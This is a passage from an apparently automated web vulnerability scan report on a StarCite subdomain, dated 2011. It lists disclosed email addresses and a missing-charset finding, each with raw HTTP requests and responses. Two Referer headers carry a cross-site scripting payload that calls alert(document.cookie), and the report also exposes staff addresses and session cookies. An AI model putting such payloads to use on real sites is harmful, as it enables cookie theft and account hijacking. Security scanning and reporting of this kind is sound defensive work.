Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="/starcite/" title="Customer Support@starcite.com ">service@starcite.com</a>
...[SNIP]...

5.3. http://www2.starcite.com/starcite/destinationsolutions/finddestinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/destinationsolutions/finddestinations

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/destinationsolutions/finddestinations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:50 GMT;path=/
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="mailto:dchou@starcite.com">dchou@starcite.com</a>
...[SNIP]...

5.4. http://www2.starcite.com/starcite/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/home

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/home HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:59 GMT;path=/
Content-Length: 39445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...
<a href="mailto:srosenlund@starcite.com">
...[SNIP]...

5.5. http://www2.starcite.com/starcite/locations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/locations

Issue detail

The following email addresses were disclosed in the response:

Request

GET /starcite/locations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:00 GMT;path=/
Content-Length: 18662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="mailto:info@starcite.com">info@StarCite.com</a>
...[SNIP]...
<a href="mailto:info@starcite.com">info@StarCite.com</a>
...[SNIP]...
<a href="mailto:europe@starcite.com">europe@StarCite.com</a>
...[SNIP]...
<a href="mailto:info@starcite.com">info@StarCite.com</a>
...[SNIP]...
<a href="mailto:sales@starcite.com">sales@starcite.com</a>
...[SNIP]...
<a href="mailto:service@starcite.com">service@starcite.com</a>
...[SNIP]...
<a href="mailto:rfpservice@starcite.com">rfpservice@starcite.com</a>
...[SNIP]...

5.6. http://www2.starcite.com/starcite/misc/forms.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/forms.css

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/misc/forms.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 16 Apr 2009 21:02:12 GMT
ETag: "3000000002388-a90-467b260cdaa1f"
Accept-Ranges: bytes
Content-Length: 2704
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/* ------------------------------------------------------

StarCite Forms
Dan Wilt, dan@enhancedinnovations.com

-------------------------------------------------------*/

/* ------------------------------------------------------
Custom Resets
-------------------------------------------------------*/

@
...[SNIP]...

5.7. http://www2.starcite.com/starcite/misc/jquery/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/misc/jquery/jquery.cookie.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 29 May 2008 15:50:25 GMT
ETag: "100000000259c-1096-44e607cd4f240"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

5.8. http://www2.starcite.com/starcite/node/929  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/929

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/node/929 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:44 GMT;path=/
Content-Length: 13741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="mailto:srosenlund@starcite.com">
...[SNIP]...

5.9. http://www2.starcite.com/starcite/privacy  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/privacy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /starcite/privacy HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:15:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:37:40 GMT;path=/
Content-Length: 50747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="mailto:security@starcite.com">security@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...
ing such access would violate another person's rights. In some circumstances, StarCite may charge a reasonable fee for access to Personal Data. Users can contact the StarCite customer services team at service@starcite.com to request access to change personal information.</p>
...[SNIP]...
<a href="http://mce_host/starcite/privacy@starcite.com">privacy@starcite.com</a>
...[SNIP]...

6. HTML does not specify charset  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/Solutionvideo/form.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /starcite/Solutionvideo/form.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:46 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 19:17:52 GMT
ETag: "29000000002dbf-60b5-47703a6b9d474"
Accept-Ranges: bytes
Content-Length: 24757
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<
...[SNIP]...

Report generated by XSS.CX at Sun Jan 02 08:26:56 CST 2011.